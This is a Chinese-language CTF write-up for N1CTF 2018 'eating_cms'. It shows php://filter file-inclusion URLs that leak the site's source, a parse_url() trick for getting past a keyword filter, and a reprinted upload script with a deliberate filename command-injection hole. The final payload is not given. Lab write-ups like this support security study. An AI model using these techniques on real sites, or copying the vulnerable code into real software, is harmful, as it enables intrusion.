[N1CTF 2018]eating_cms1
进入到页面是一个login登录页面 .
去访问他的register.php页面进入注册页面.
注册进入.
一眼文件包含.
去读取一下user.php
http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=user
解码.
<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
Header("Location: index.php");
}
if($_SESSION['isadmin'] === '1'){
$oper_you_can_do = $OPERATE_admin;
}else{
$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
if(!isset($_GET['page']) || $_GET['page'] === ''){
$page = 'info';
}else {
$page = $_GET['page'];
}
}
else{
if(!isset($_GET['page'])|| $_GET['page'] === ''){
$page = 'guest';
}else {
$page = $_GET['page'];
if($page === 'info')
{
// echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
Header("Location: user.php?page=guest");
}
}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
// $page = 'info';
//}
include "$page.php";
?>
看到它包含了一个function函数.
继续读取.
http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=function
<?php
session_start();
require_once "config.php";
function Hacker()
{
Header("Location: hacker.php");
die();
}
function filter_directory()
{
$keywords = ["flag","manage","ffffllllaaaaggg"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function filter_directory_guest()
{
$keywords = ["flag","manage","ffffllllaaaaggg","info"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function Filter($string)
{
global $mysqli;
$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
for ($i = 0; $i < strlen($string); $i++) {
if (strpos("$whitelist", $string[$i]) === false) {
Hacker();
}
}
if (preg_match("/$blacklist/is", $string)) {
Hacker();
}
if (is_string($string)) {
return $mysqli->real_escape_string($string);
} else {
return "";
}
}
function sql_query($sql_query)
{
global $mysqli;
$res = $mysqli->query($sql_query);
return $res;
}
function login($user, $pass)
{
$user = Filter($user);
$pass = md5($pass);
$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
echo $sql;
$res = sql_query($sql);
// var_dump($res);
// die();
if ($res->num_rows) {
$data = $res->fetch_array();
$_SESSION['user'] = $data[username_which_you_do_not_know];
$_SESSION['login'] = 1;
$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
return true;
} else {
return false;
}
return;
}
function updateadmin($level,$user)
{
$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
echo $sql;
$res = sql_query($sql);
// var_dump($res);
// die();
// die($res);
if ($res == 1) {
return true;
} else {
return false;
}
return;
}
function register($user, $pass)
{
global $mysqli;
$user = Filter($user);
$pass = md5($pass);
$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
$res = sql_query($sql);
return $mysqli->insert_id;
}
function logout()
{
session_destroy();
Header("Location: index.php");
}
?>
发现全是函数,而且其中的 filter_directory();被调用了,分析一下.
function filter_directory()
{
$keywords = ["flag","manage","ffffllllaaaaggg"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
是个parse_url漏洞利用,这段代码想让我们输入的url地址问好后过滤了"flag","manage","ffffllllaaaaggg",所以我们可以推测存在“flag","manage","ffffllllaaaaggg"
东西.
知识点:
parse_url()
函数是 PHP 中用于解析 URL 并返回其组成部分的函数。这个函数通常很安全,但如果不正确地使用或当输入的 URL 格式异常时,可能会引发一些潜在的问题或误解,但这并不直接等同于传统意义上的“漏洞”。
parse_url()
的基本用法
parse_url()
函数接受一个字符串(表示 URL),并返回一个关联数组,包含 URL 的各个组成部分(如 scheme、host、port、user、pass、path、query、fragment)。如果解析失败,则返回 FALSE。潜在问题
错误的 URL 格式:如果输入的 URL 格式不正确,
parse_url()
可能不会按预期工作。例如,如果 URL 缺少协议部分(如http://
或https://
),则parse_url()
可能会将 URL 的第一部分解析为path
而不是host
。编码问题:URL 中的特殊字符通常需要按照百分比编码(URL 编码)进行编码。如果未正确编码,
parse_url()
可能无法正确解析这些部分,尤其是在路径(path)或查询字符串(query)中。安全误解:有时,开发者可能错误地认为
parse_url()
可以用于验证或清理 URL。实际上,它仅仅是一个解析工具,并不提供安全验证或清理功能。因此,如果开发者没有进一步处理或验证parse_url()
的输出,就可能会受到注入攻击等安全威胁。
所以我们可以利用格式错误,让其解析失败而输出false,从而绕过.
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
解码.
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}else {
echo "you can find sth in m4aaannngggeee";
}
?>
继续读取 .
//user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}
include "templates/upload.html";
?>
访问一下.
文件上传不过是个假的,上传之后去跳到404页面.
不过看源码发现了一个php页面.
读取一下.
http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81//user.php?page=php://filter/convert.base64-encode/resource=upllloadddd
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
die("error:can not move");
}
}else{
die("error:not an upload fileï¼");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
unlink($newfile);
die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
unlink($newfile);
}
?>
是一个filename上传漏洞.
现在主要的目标就是找到真正的上传点.
对上面步骤进行回溯,找到了上传点.
http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=m4aaannngggeee
开始注入.
游戏结束.